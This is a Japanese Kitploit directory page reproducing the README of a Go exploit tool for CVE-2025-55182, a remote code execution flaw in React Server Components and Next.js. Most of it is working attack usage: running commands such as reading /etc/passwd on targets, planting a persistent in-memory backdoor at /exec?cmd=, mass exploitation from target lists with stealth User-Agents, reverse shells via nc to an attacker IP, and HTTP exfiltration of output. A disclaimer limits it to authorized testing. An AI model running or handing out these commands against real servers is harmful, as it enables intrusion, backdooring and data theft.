Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-golang-PoC — CVE-2025-55182 React Server Components RCE - Go PoC | Kitploit
ツール/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

CVE-2025-55182 React Server Components RCE - Go PoC

618ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ 認可されたセキュリティテスト専用 ⚠️

説明

CVE-2025-55182 (別名 CVE-2025-66478) は、React Server Components (Flight プロトコル) における重大なリモートコード実行 (RCE) の脆弱性です。このツールは、セキュリティ研究および認可されたペネトレーションテストを目的とした PoC の Go 実装です。

影響を受けるバージョン:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (パッチ適用前: 15.0.5、15.1.9、15.2.6、15.3.6、15.4.8、15.5.7)
  • Next.js: 16.x (16.0.7 より前)
  • Next.js: 14.3.0-canary.77 以降のカナリーバージョン

脆弱性の詳細

このエクスプロイトは、Flight プロトコルのデシリアライゼーションにおけるプロトタイプ汚染 (prototype pollution) を利用します:

  1. $@ デシリアライゼーションを使用して Chunk 参照を取得する
  2. Chunk.prototype.then をルートオブジェクトの then プロパティとして配置する
  3. ステータスを RESOLVED_MODEL に設定し、制御された偽のチャンクで initializeModelChunk を呼び出す
  4. Blob のデシリアライゼーションをトリガーし、攻撃者のペイロードで response._formData.get を呼び出す
  5. 任意のコード実行のために response._formData.get を Function コンストラクタに設定する

特徴

  • 完全な RCE 機能 - 出力付きで任意のコマンドを実行
  • 脆弱性チェックモード - 悪用を行わない安全な検出
  • Next.js バージョン検出 - 自動バージョンフィンガープリンティング
  • メモリシェル注入 - /exec?cmd= に持続的バックドアを設置
  • バッチスキャン - JSON 出力対応のマルチスレッドスキャン
  • 包括的なプロキシサポート:
    • 認証あり/なしの SOCKS5
    • SOCKS4/SOCKS4a
    • 認証あり/なしの HTTP/HTTPS プロキシ
  • ステルスモード - ブラウザ、クローラー、セキュリティの User-Agent
  • レート制限 - リクエスト間の遅延を設定可能
  • リバースシェル - mkfifo + nc (Alpine/busybox で動作)
  • データ外部送信 - コマンド出力を攻撃者サーバーに POST 送信
  • クロスプラットフォームビルド - 30 以上の OS/アーキテクチャの組み合わせ
  • JSON 出力 - 自動化のための機械可読な結果

インストール

ビルド済みバイナリ

GitHub Releases からお使いのプラットフォーム向けの最新リリースをダウンロードしてください。

利用可能なバイナリ:

  • Linux: amd64、386、arm、arm64、mips、mipsle、mips64、riscv64、ppc64、s390x
  • Windows: amd64、386、arm64
  • macOS: amd64 (Intel)、arm64 (Apple Silicon)
  • FreeBSD、OpenBSD、NetBSD: amd64、386、arm、arm64
  • 他にも多数...

ソースから

root@kitploit:~
# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

ソースからのビルド

./build.sh を実行すると、サポートされているすべてのプラットフォーム向けのバイナリが build/ ディレクトリに生成されます。

使用方法

基本的なコマンド

root@kitploit:~
# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

メモリシェル (持続的バックドア)

root@kitploit:~
# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

カスタムヘッダー & SSL バイパス

root@kitploit:~
# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

プロキシサポート

root@kitploit:~
# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

バッチスキャン

root@kitploit:~
# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

ネットワーク外部送信

root@kitploit:~
# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

オプション

プロキシの種類

root@kitploit:~
socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

ステルスモード

ModeDescription
browser実際のブラウザのリクエストを模倣 (Chrome、Firefox、Safari、Edge) - デフォルト
crawler検索エンジンのクローラーを模倣 (Googlebot、Bingbot、Baiduspider など)
securityセキュリティスキャナーの User-Agent を使用 (Nessus、Nuclei)

メモリシェル

メモリシェル機能は、以下の動作を行う持続的バックドアを注入します:

  1. 事前チェック - 注入前に、シェルがすでにインストールされているかを確認
  2. http.Server.prototype.emit をフック - すべての HTTP リクエストを傍受
  3. /exec エンドポイントを作成 - cmd クエリパラメータを受け付ける
  4. 再起動まで持続 - サーバーメモリ内に残存
root@kitploit:~
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'

プロジェクト構成

root@kitploit:~
.
├── main.go                   # CLI entry point
├── pkg/
│   ├── colors/
│   │   └── colors.go         # Terminal colors with --nocolor support
│   ├── exploit/
│   │   └── exploit.go        # Core exploit logic, memory shell, version detection
│   ├── proxy/
│   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
│   ├── scanner/
│   │   └── scanner.go        # Batch scanning with JSON output
│   └── stealth/
│       └── stealth.go        # User-Agent randomization
├── build.sh                  # Cross-platform build script
├── go.mod                    # Go module file
├── go.sum                    # Go dependencies
└── README.md                 # This file

クロスプラットフォームビルド

build.sh スクリプトは 30 以上のプラットフォーム向けにビルドします:

  • Linux: amd64、386、arm、arm64、mips、mipsle、mips64、riscv64、ppc64、s390x
  • Windows: amd64、386、arm64 (.exe)
  • macOS: amd64 (Intel)、arm64 (Apple Silicon)
  • FreeBSD: amd64、386、arm、arm64
  • OpenBSD: amd64、386、arm、arm64
  • NetBSD: amd64、386、arm、arm64
  • DragonFly BSD: amd64
  • Solaris/Illumos: amd64
  • Plan 9: amd64、386
  • AIX: ppc64
root@kitploit:~
chmod +x build.sh
./build.sh

JSON 出力形式

--json フラグを使用すると、結果は JSONL 形式 (1 行に 1 つの JSON) で保存されます:

root@kitploit:~
{"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}

完全なレポート (_report.json) には以下が含まれます:

root@kitploit:~
{
  "scan_time": "2025-12-06T12:00:00Z",
  "total_urls": 100,
  "vulnerable_count": 5,
  "safe_count": 90,
  "timeout_count": 5,
  "results": [...]
}

バージョン検出

このツールは Next.js のバージョンを以下から検出できます:

  • X-Powered-By ヘッダー
  • HTML/JS ソース (__NEXT_DATA__、/_next/ パス)
  • ビルドマニフェストのパターン

脆弱なバージョンは赤色で強調表示されます。

免責事項

⚠️ 重要な法的通知 ⚠️

このツールは教育目的および認可されたセキュリティテスト専用として提供されています。

想定される用途

  • セキュリティ研究および脆弱性評価
  • 書面による許可を得た認可されたペネトレーションテスト
  • 自身のアプリケーションおよびインフラストラクチャのテスト
  • 管理されたラボ環境での教育デモンストレーション
  • パッチおよびセキュリティ緩和策の開発

禁止される用途

以下の目的でこのツールを使用することは固く禁止されています:

  • 所有していない、またはテストの明示的な書面による許可を得ていないシステムに対して
  • 悪意のある、違法な、または不正な活動のために
  • コンピュータシステムまたはネットワークへの不正アクセスを得るために
  • 適用される地域、州、国の法律または国際法に違反して
  • 許可なくシステムを妨害、破壊、または侵害するために

法的警告

コンピュータシステムへの不正アクセスは、世界中のほとんどの法域で犯罪行為です。これには以下の国・地域が含まれますが、これらに限定されません:

  • 🇺🇸 米国: コンピュータ詐欺及び悪用取締法 (CFAA) - 最高 20 年の禁固刑
  • 🇪🇺 EU: 情報システムへの攻撃に関する指令 2013/40/EU
  • 🇷🇺 ロシア: 刑法第 272〜274 条
  • 🇬🇧 英国: 1990 年コンピュータ濫用法
  • 🇩🇪 ドイツ: 刑法第 202a〜202d 条
  • 🇨🇳 中国: 刑法第 285〜287 条

保証なし

本ソフトウェアは「現状のまま」提供され、明示または黙示を問わずいかなる種類の保証もありません。作者および著作権者は、本ソフトウェアの使用に起因するいかなる請求、損害、その他の責任も負わないものとします。

利用者の責任

このツールをダウンロード、インストール、または使用することにより、以下を確認したことになります:

  1. お客様はご自身の行動に対して単独で責任を負うこと
  2. 所有している、またはテストの明示的な許可を得たシステムでのみこのツールを使用すること
  3. 本ソフトウェアの使用に伴うすべてのリスクを理解し、受け入れること
  4. 著者は、不正使用または引き起こされた損害について一切の責任を負わないこと

これらの条件に同意できない場合は、このツールを使用しないでください。

作者

Vladislav Tislenko (別名 keklick1337)
日付: 2025-12-05

ライセンス

このプロジェクトはMIT ライセンスの下でライセンスされています。詳細については LICENSE ファイルを参照してください。


責任を持って使用してください。常に合法的に。🔐

ツールをダウンロード
OptionDescription
-u, --urlターゲット URL (例: http://localhost:3000)
-f, --fileターゲット URL の一覧を含むファイル (1 行に 1 つ)
--urls-f/--file のエイリアス
-o, --output脆弱なターゲットを保存する出力ファイル
--json結果を JSON 形式で出力
-c, --command実行するコマンド (出力付き)
--check脆弱性をチェック
--version-checkNext.js のバージョンを検出
--proxyプロキシ URL (socks5://user:pass@ip:port、socks4://ip:port、http://ip:port)
-H, --headerカスタムヘッダー (複数回使用可能)
-k, --insecureSSL/TLS 証明書の検証をスキップ
--stealthステルスモード: browser、crawler、security (デフォルト: browser)
--delayリクエスト間の遅延 (例: 2s、500ms)
--variants徹底的なチェックのために複数のペイロードバリアントを使用
--memshellメモリシェルを注入 (持続的バックドア)
--test-shellメモリシェルがアクティブかテスト
--shell-execメモリシェル経由でコマンドを実行
--revshell IP PORTリバースシェルを確立
--exfil CMD IP PORTコマンドを実行し、出力を POST 送信
-t, --timeoutリクエストタイムアウト (秒) (デフォルト: 15)
--threads同時実行スレッド数 (デフォルト: 10)
--workers--threads のエイリアス
--nocolor色付き出力を無効化 (Windows/パイプ用)
-h, --helpヘルプメッセージを表示
-v, --versionバージョンを表示